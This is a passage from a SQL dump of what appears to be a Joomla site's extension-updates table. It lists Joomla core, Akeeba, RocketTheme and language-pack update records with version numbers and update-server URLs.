',''),(6095,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6096,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6097,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6098,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6099,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6100,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6101,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6102,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6103,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6104,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6105,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6106,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6107,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6108,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6109,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6110,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6111,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6112,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6113,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6114,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6115,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6116,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6117,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6118,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6119,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6120,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6121,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6122,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6123,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6124,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6125,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6126,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6127,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6128,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6129,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6130,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6131,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6132,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6133,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6134,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6135,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6136,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6137,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6138,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6139,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6140,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6141,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6142,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6143,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6144,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6145,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6146,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6147,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6148,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6149,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6150,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6151,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6152,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6153,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6154,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6155,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6156,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6157,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6158,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6159,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6160,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6161,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6162,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6163,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6164,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6165,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6166,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6167,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6168,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6169,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6170,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6171,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6172,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6173,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6174,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6175,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6176,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6177,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6178,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6179,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6180,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6181,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6182,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6183,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6184,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6185,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6186,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6187,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6188,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6189,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6190,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6191,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6192,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6193,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6194,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6195,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6196,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6197,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6198,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6199,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6200,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6201,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6202,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6203,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6204,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6205,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6206,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6207,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6208,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6209,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6210,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6211,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6212,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6213,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6214,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6215,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6216,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6217,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6218,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6219,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6220,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6221,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6222,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6223,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6224,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6225,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6226,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6227,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6228,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6229,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6230,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6231,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6232,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6233,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6234,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6235,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6236,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6237,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6238,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6239,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6240,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6241,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6242,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6243,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6244,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6245,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6246,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6247,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6248,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6249,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6250,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6251,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6252,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6253,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6254,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6255,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6256,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6257,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6258,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6259,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6260,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6261,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6262,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6263,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6264,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6265,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6266,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6267,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6268,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6269,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6270,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6271,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6272,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6273,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6274,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6275,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6276,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6277,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6278,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6279,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6280,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6281,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6282,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6283,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6284,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6285,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6286,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6287,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6288,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6289,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6290,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6291,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6292,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6293,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6294,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6295,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6296,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6297,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6298,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6299,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6300,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6301,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6302,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6303,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6304,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6305,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6306,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6307,57,0,'Serbian 